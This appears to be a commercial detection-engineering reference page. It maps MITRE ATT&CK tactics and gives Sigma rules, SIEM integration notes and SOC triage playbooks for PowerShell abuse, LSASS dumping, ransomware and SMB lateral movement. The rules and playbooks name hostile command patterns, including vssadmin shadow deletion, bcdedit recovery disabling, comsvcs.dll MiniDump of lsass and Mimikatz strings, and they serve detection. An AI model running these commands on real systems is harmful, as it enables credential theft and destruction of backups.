⚔ Detection Engineering Reference

MITRE ATT&CK
Detection Engineering Hub

Production-grade detection coverage across the full ATT&CK matrix. Sigma rules, SIEM integration patterns, SOC playbooks, and enterprise detection engineering guidance built for analyst teams.

14
ATT&CK Tactics
200+
Techniques
Sigma
Detection Format
6
SIEM Integrations
Get Detection Packs → Enterprise SOC Consultation
Full Matrix Coverage

14 ATT&CK Tactics — Adversary Lifecycle

Complete MITRE ATT&CK Enterprise matrix coverage from initial access through exfiltration and impact.

TA0001
Initial Access
Adversary techniques to gain an initial foothold within a network — phishing, exploit public-facing applications, supply chain compromise.
T1566T1190T1195T1133
Detection coverage: HIGH · 9 techniques
TA0002
Execution
Techniques for running adversary-controlled code — command and scripting interpreters, scheduled tasks, WMI, container execution.
T1059T1053T1047T1204
Detection coverage: HIGH · 14 techniques
TA0003
Persistence
Techniques to maintain their foothold — boot/logon autostart, account creation, scheduled tasks, implants, hijack execution flow.
T1547T1098T1543T1505
Detection coverage: HIGH · 19 techniques
TA0004
Privilege Escalation
Gaining higher-level permissions — process injection, token manipulation, exploitation of vulnerabilities, abuse elevation control mechanisms.
T1055T1134T1548T1068
Detection coverage: HIGH · 13 techniques
TA0005
Defense Evasion
Techniques to avoid detection — obfuscation, masquerading, disabling security tools, living-off-the-land binaries (LOLBins), rootkits.
T1562T1036T1027T1218
Detection coverage: MED · 42 techniques
TA0006
Credential Access
Stealing credentials — credential dumping, OS credential store access, brute force, keylogging, MFA interception.
T1003T1110T1557T1539
Detection coverage: HIGH · 17 techniques
TA0007
Discovery
Internal network reconnaissance — account, file, network, system, and domain discovery for situational awareness before lateral movement.
T1087T1083T1046T1018
Detection coverage: MED · 31 techniques
TA0008
Lateral Movement
Moving through the target environment — remote services, pass-the-hash, pass-the-ticket, exploitation of remote services.
T1021T1550T1563T1570
Detection coverage: HIGH · 9 techniques
TA0009
Collection
Gathering data of interest — data from local and network drives, email collection, screen capture, input capture, clipboard data.
T1560T1114T1113T1056
Detection coverage: MED · 17 techniques
TA0010
Exfiltration
Stealing data from target network — exfiltration over C2 channel, HTTPS, DNS, cloud storage, physical media, and scheduled transfers.
T1041T1048T1567T1029
Detection coverage: MED · 9 techniques
TA0011
Command & Control
Communicating with compromised systems — web protocols, encrypted channels, domain fronting, fast-flux DNS, proxy chaining.
T1071T1573T1090T1568
Detection coverage: HIGH · 18 techniques
TA0040
Impact
Disrupting availability or integrity — data encryption for ransom, disk wiping, denial of service, resource hijacking, defacement.
T1486T1485T1498T1496
Detection coverage: HIGH · 13 techniques
TA0042
Resource Development
Establishing resources for operations — acquire infrastructure, develop capabilities, stage capabilities, obtain capabilities from 3rd parties.
T1583T1584T1585T1587
Detection coverage: LOW · 8 techniques
TA0043
Reconnaissance
Gathering information about the target — active scanning, gather victim info, phishing for information, search open sources (OSINT).
T1595T1592T1589T1598
Detection coverage: LOW · 10 techniques
Priority Detections

Highest-Value Techniques — Detection ROI

Techniques with the highest adversary usage frequency and broadest applicability across threat actor groups. Detect these first.

Priority 1 — Universal
T1059.001 — PowerShell
Command and Scripting Interpreter: PowerShell
Execution · Used by 80%+ of threat actor groups
Adversaries abuse PowerShell for execution, discovery, lateral movement, and C2. Encoded commands (-EncodedCommand), download cradles (IEX), AMSI bypass, and constrained language mode bypasses are primary detection targets.
Critical Execution T1059.001
Priority 1 — Universal
T1566.001 — Spearphishing Attachment
Phishing: Spearphishing Attachment
Initial Access · #1 initial access vector industry-wide
Malicious email attachments — Office macros, LNK files, ISO images, PDF exploits. Initial access into 90%+ of enterprise breaches starts here. Detections must cover email gateway, endpoint, and sandbox detonation signals.
Critical Initial Access T1566.001
Priority 1 — Ransomware
T1486 — Data Encrypted for Impact
Data Encrypted for Impact
Impact · Terminal ransomware encryption stage
Ransomware encryption phase — ChaCha20/AES bulk file encryption, extension renaming, shadow copy deletion (vssadmin), MBR destruction. Detecting this late-stage TTP requires behavioral analytics and honeypot file tripwires.
Critical Impact T1486
Priority 1 — Credential
T1003.001 — LSASS Memory
OS Credential Dumping: LSASS Memory
Credential Access · Pass-the-hash pivot enabler
Mimikatz, ProcDump, comsvcs.dll MiniDump — dumping LSASS process memory to extract NTLM hashes, Kerberos tickets, and clear-text credentials. PPL bypass and kernel driver attacks are active evasion routes.
Critical Credential Access T1003.001
Priority 2 — Living-off-Land
T1218 — Signed Binary Proxy Execution
System Binary Proxy Execution (LOLBins)
Defense Evasion · Antivirus bypass mechanism
Using legitimate signed Windows binaries to execute malicious payloads — regsvr32, mshta, certutil, wscript, rundll32. These bypass application whitelisting and appear as normal system activity without behavioral context.
High Defense Evasion T1218
Priority 2 — Lateral Movement
T1021.002 — SMB/Windows Admin Shares
Remote Services: SMB/Windows Admin Shares
Lateral Movement · Post-credential compromise pivot
Using stolen credentials to access ADMIN$, C$, IPC$ shares for file copy and execution. PsExec, Impacket smbexec/wmiexec, and Cobalt Strike SMB lateral movement all generate characteristic SMB authentication events.
High Lateral Movement T1021.002
Sigma Detection Library

Production Detection Rules — Sigma Format

Platform-agnostic Sigma rules for high-priority ATT&CK techniques. Convert to Splunk SPL, Elastic EQL, Microsoft Sentinel KQL, or Chronicle using sigmatools.

PowerShell Encoded Command Execution
Critical Execution T1059.001
Detects PowerShell execution with Base64-encoded commands via -EncodedCommand or -enc flags — a primary technique for obfuscating download cradles, AMSI bypasses, and in-memory payload execution.
title: PowerShell Encoded Command Execution id: a6eb3fef-8b15-4b8e-9d5a-7c1e2f3d8b9a status: production description: Detects PowerShell -EncodedCommand execution used to obfuscate malicious payloads and bypass defenses references: - https://attack.mitre.org/techniques/T1059/001/ author: CYBERDUDEBIVASH SENTINEL APEX Detection Engineering date: 2026-05-28 tags: - attack.execution - attack.t1059.001 - attack.defense_evasion - attack.t1027 logsource: category: process_creation product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: - ' -EncodedCommand ' - ' -enc ' - ' -EC ' - ' -e ' filter_legitimate: ParentImage|endswith: - '\sccm.exe' - '\ccmexec.exe' condition: selection and not filter_legitimate falsepositives: - Legitimate automation scripts using encoded commands - SCCM client management operations level: high
Correlated Detection Signals
AMSI bypass strings in CommandLine
IEX/Invoke-Expression with download
Outbound HTTP/S from powershell.exe
Unusual parent process (Word, Excel, browser)
Base64 length > 500 characters
-NoProfile -WindowStyle Hidden flags
LSASS Memory Access — Credential Dumping
Critical Credential Access T1003.001
Detects attempts to read LSASS process memory to extract credential material. Covers ProcDump, comsvcs.dll MiniDump, Task Manager dump, and direct LSASS handle acquisition via OpenProcess.
title: LSASS Memory Dump Attempt id: b9d7f3c2-1e4a-5b8d-9c0f-2a3e4d5f6b7c status: production description: Detects LSASS memory access for credential extraction tags: - attack.credential_access - attack.t1003.001 logsource: category: process_access product: windows detection: selection_lsass_access: TargetImage|endswith: '\lsass.exe' GrantedAccess|contains: - '0x1010' - '0x1410' - '0x147a' - '0x143a' selection_procdump: Image|endswith: '\procdump.exe' CommandLine|contains: 'lsass' selection_comsvcs: CommandLine|contains|all: - 'comsvcs.dll' - 'MiniDump' condition: 1 of selection_* falsepositives: - CrowdStrike/SentinelOne agent self-inspection - Authorized red team activity - Windows Error Reporting (WER) creating crash dumps level: critical
Correlated Detection Signals
SeDebugPrivilege token acquisition
Mimikatz binary hash or strings
.dmp file written to unusual path
LSASS handle with PROCESS_VM_READ
PPL bypass driver load event
Subsequent pass-the-hash SMB auth
Ransomware — Bulk File Encryption & Shadow Copy Deletion
Critical Impact T1486
Detects the terminal encryption phase of ransomware operations — rapid file extension changes, vssadmin shadow copy deletion, MBR wiping, and ransom note creation. At this stage, containment is critical within minutes.
title: Ransomware Shadow Copy Deletion and Bulk Encryption id: c3e8a1d4-2f5b-6c9e-0a1b-3d4e5f6c7d8e status: production description: Detects ransomware pre-encryption and encryption activity tags: - attack.impact - attack.t1486 - attack.t1490 logsource: category: process_creation product: windows detection: selection_vssadmin: Image|endswith: '\vssadmin.exe' CommandLine|contains: - 'delete shadows' - 'resize shadowstorage' selection_wbadmin: Image|endswith: '\wbadmin.exe' CommandLine|contains: 'delete catalog' selection_bcdedit: Image|endswith: '\bcdedit.exe' CommandLine|contains: - 'recoveryenabled no' - 'bootstatuspolicy ignoreallfailures' selection_cipher: Image|endswith: '\cipher.exe' CommandLine|contains: '/w:' condition: 1 of selection_* falsepositives: - Backup software performing legitimate shadow management - Windows Server Backup configuration level: critical
Correlated Detection Signals
High-frequency file rename events (>100/sec)
Novel file extensions appearing across shares
README.txt / HOW_TO_DECRYPT.txt created
CPU spike + disk I/O saturation
Network share enumeration prior to encryption
taskkill /F of backup/AV processes
Lateral Movement via SMB Admin Shares
High Lateral Movement T1021.002
Detects lateral movement using administrative SMB shares (ADMIN$, C$, IPC$) — characteristic of PsExec, Impacket tooling, Cobalt Strike lateral movement modules, and automated ransomware propagation.
title: Lateral Movement via SMB Admin Share Access id: d4f9b2e5-3a6c-7d0f-1b2c-4e5f6a7b8c9d status: production description: Detects suspicious SMB administrative share access indicating lateral movement activity tags: - attack.lateral_movement - attack.t1021.002 logsource: product: windows service: security detection: selection: EventID: 5140 ShareName|contains: - '\ADMIN$' - '\C$' - '\IPC$' filter_domain_controllers: SubjectUserName|endswith: '$' filter_backup: IpAddress: - '127.0.0.1' condition: selection and not 1 of filter_* falsepositives: - Legitimate remote administration (SCCM, Ansible) - IT helpdesk operations level: medium
Correlated Detection Signals
New service installation (Event 7045) on remote host
PSEXESVC service creation
Logon Type 3 from non-admin workstation
Executable dropped to ADMIN$ then executed
Pass-the-hash NTLM authentication
Spray of admin share access to multiple hosts
Platform Integration

SIEM & EDR Integration Guidance

Sigma rules convert to native query languages for all major platforms. Sentinel APEX Detection Packs include pre-converted, tuned rules for each platform.

Microsoft Sentinel
Convert Sigma to KQL (Kusto Query Language). Deploy as Analytics Rules with MITRE ATT&CK tactic mapping and alert enrichment via UEBA.
Sigma → KQL via sigma-cli + kusto backend
MITRE ATT&CK tactic/technique metadata
UEBA enrichment for behavioral context
Automation rules for SOAR integration
Alert fusion with incident correlation
Splunk SIEM
Convert Sigma to Splunk SPL. Deploy as correlation searches in Enterprise Security with risk-based alerting (RBA) and ESCU framework alignment.
Sigma → SPL via sigma-cli + splunk backend
Risk-Based Alerting (RBA) risk scores
ESCU detection framework alignment
Notable event generation + correlation
Adaptive Response for automated containment
Elastic Security
Convert Sigma to Elastic EQL or ES|QL. Deploy via Detection Engine with prebuilt rule templates and ML-based anomaly detection jobs.
Sigma → EQL via sigma-cli + elasticsearch
Event Query Language (EQL) sequences
ML anomaly detection integration
Entity Analytics for user risk scoring
Fleet integration for endpoint telemetry
CrowdStrike Falcon
Deploy Sigma as Custom IOA (Indicator of Attack) rules or Fusion SOAR workflows. Correlate with Threat Graph and identity protection events.
Custom IOA rules via Falcon Prevent
Falcon Insight XDR event search
Threat Graph behavioral correlation
Fusion SOAR automated response
Identity Protection Kerberos detections
Google Chronicle
Convert Sigma to YARA-L 2.0 for Chronicle SIEM. Deploy as Rules with detection engine scheduling and context-enriched entity graph.
Sigma → YARA-L via sigma-cli + chronicle
Entity enrichment via UDMS model
IOC retrohunt across petabyte-scale logs
SOAR integration via Chronicle SOAR
GCP security telemetry native ingestion
Palo Alto Cortex XDR
Deploy BIOC (Behavioral Indicator of Compromise) rules for ATT&CK technique coverage. Correlate XDR alerts with Cortex XSOAR automated response.
BIOC rule creation for behavioral detection
XQL (XDR Query Language) hunting
Causality Chain (CC) visualization
Cortex XSOAR SOAR automation
Unit 42 threat intel integration
Coverage Assessment

Detection Coverage Matrix — Enterprise SOC

Recommended detection coverage targets for enterprise SOC teams. Gaps represent high-priority investments for detection engineering roadmaps.

Tactic Technique T-ID EDR SIEM Network UEBA Priority
Initial AccessSpearphishing AttachmentT1566.001 HHML P1
ExecutionPowerShellT1059.001 HHLM P1
ExecutionWindows Management InstrumentationT1047 HMLL P2
PersistenceBoot/Logon Autostart — Registry Run KeysT1547.001 HHLL P2
Privilege Esc.Process InjectionT1055 HMLL P1
Defense EvasionSigned Binary Proxy Exec (LOLBins)T1218 MHLL P2
Credential AccessOS Credential Dumping — LSASST1003.001 HHLH P1
Lateral MovementSMB / Windows Admin SharesT1021.002 MHHH P1
C&CEncrypted Channel — TLST1573.002 LMHM P2
ExfiltrationExfiltration Over Web ServiceT1567 LMHH P2
ImpactData Encrypted for Impact (Ransomware)T1486 HHLH P1
ImpactInhibit System RecoveryT1490 HHLL P1
H High coverage (detect reliably)
M Medium (partial, tuning required)
L Low/gap (detection investment needed)
SOC Operations

Detection Response Playbooks

Structured response workflows for high-priority ATT&CK technique detections. Designed for L1/L2 analysts with clear triage, escalation, and containment steps.

Credential Threat
LSASS Dump Alert Triage — T1003.001
  • 1
    Confirm LSASS access event — validate GrantedAccess flags (0x1010, 0x1410, 0x147a)
  • 2
    Identify source process — check parent chain for unusual ancestry (cmd.exe, powershell.exe, Office app)
  • 3
    Check for Mimikatz strings in memory or on disk — search endpoint for sekurlsa, logonpasswords, wdigest
  • 4
    Review subsequent auth logs — look for lateral movement via NTLM pass-the-hash within 30 minutes
  • 5
    Isolate endpoint if confirmed — revoke affected user credentials via AD immediately
  • 6
    Force password reset for all accounts active on host at time of dump
Ransomware — CRITICAL
Active Ransomware Encryption — T1486
  • 1
    Confirm encryption indicator — vssadmin delete or mass file extension change events
  • 2
    Immediately isolate affected host from network — block all outbound and lateral SMB
  • 3
    Identify patient zero — trace lateral movement path back to initial infection vector
  • 4
    Scan all adjacent systems — check for dormant ransomware payload pre-detonation
  • 5
    Invoke IR retainer and notify legal — ransomware is a reportable incident in most jurisdictions
  • 6
    Preserve forensic artifacts before remediation — memory dump, SIEM logs, network PCAP
Lateral Movement
SMB Admin Share Lateral Movement — T1021.002
  • 1
    Identify source and destination hosts — map Logon Type 3 events with admin share access (Event 5140)
  • 2
    Check for service installation on destination — Event 7045 PSEXESVC or unusual service name
  • 3
    Trace credential source — identify which account was used and how it was obtained
  • 4
    Map lateral movement graph — identify all hosts accessed from source within prior 24 hours
  • 5
    Contain affected accounts — disable and rotate credentials for compromised service accounts
  • 6
    Block NTLM authentication where Kerberos is available — reduce pass-the-hash exposure
Execution Alert
Suspicious PowerShell Execution — T1059.001
  • 1
    Decode Base64 command — use CyberChef or in-SIEM decode to reveal actual payload intent
  • 2
    Check for download cradle — IEX, Invoke-WebRequest, DownloadString with external URL
  • 3
    Inspect parent process — Office document or browser spawn is high-confidence phishing indicator
  • 4
    Review network connections from powershell.exe — check DNS queries and outbound HTTP/S
  • 5
    Detonate any dropped files in sandbox — extract IOCs for platform-wide blocking
  • 6
    Correlate with email gateway — identify delivery method and scope of phishing campaign
Defense Evasion
LOLBin Proxy Execution — T1218
  • 1
    Identify LOLBin in use — certutil, mshta, regsvr32, rundll32, wscript, cmstp
  • 2
    Extract payload path or URL from CommandLine — identify remote or local payload source
  • 3
    Check LOLBin child processes and network connections — map post-execution activity
  • 4
    Correlate with AppLocker/WDAC bypass indicators if policy is deployed
  • 5
    Block LOLBin command patterns at endpoint policy layer if not already blocked
Persistence Detection
Registry Autostart Persistence — T1547.001
  • 1
    Identify new registry Run/RunOnce key — check HKLM and HKCU for unsigned or unusual entries
  • 2
    Validate executable path — check file hash against threat intel, verify code signing
  • 3
    Check registry write process ancestry — map the process chain that installed the key
  • 4
    Review creation timestamp against other security events in same timeframe
  • 5
    Remove malicious key and quarantine executable — verify removal and reboot persistence
Enterprise Detection Engineering

Deploy Production-Grade ATT&CK Detection Coverage

Sentinel APEX provides pre-tuned, production-certified detection packs for your SIEM platform — built by detection engineers for SOC operations teams.

🎯
Detection Pack Library
300+ Sigma rules pre-converted for Splunk, Sentinel, Elastic, and Chronicle. Full ATT&CK coverage with false-positive baselines and tuning guidance for enterprise environments.
View Detection Packs →
🔬
Detection Engineering Consultation
Bespoke detection engineering for your environment. Detection gap analysis, Sigma rule development, SIEM tuning, threat hunting playbooks, and SOC maturity assessment.
Book Consultation →
Threat Intelligence API
Real-time ATT&CK technique telemetry via Sentinel APEX API. Enrich your SIEM alerts with live adversary TTP data, IOC context, and detection priority scoring.
Access Sentinel APEX API →
Related Intelligence

Continue Your Security Research

AI Security
OWASP LLM Top 10 2025
Complete AI security risk framework with MITRE ATLAS mappings, detection signals, and enterprise controls.
Threat Intelligence
Live Threat Intelligence Hub
Real-time CVE feeds, threat actor tracking, and intelligence reports from 27 sources.
Products
Detection Pack Store
Production Sigma rule packs for Splunk, Sentinel, Elastic, and Chronicle — tuned for enterprise.
Enterprise
SOC Consulting Services
Detection engineering, threat hunting, SIEM deployment, and MSSP partnership programs.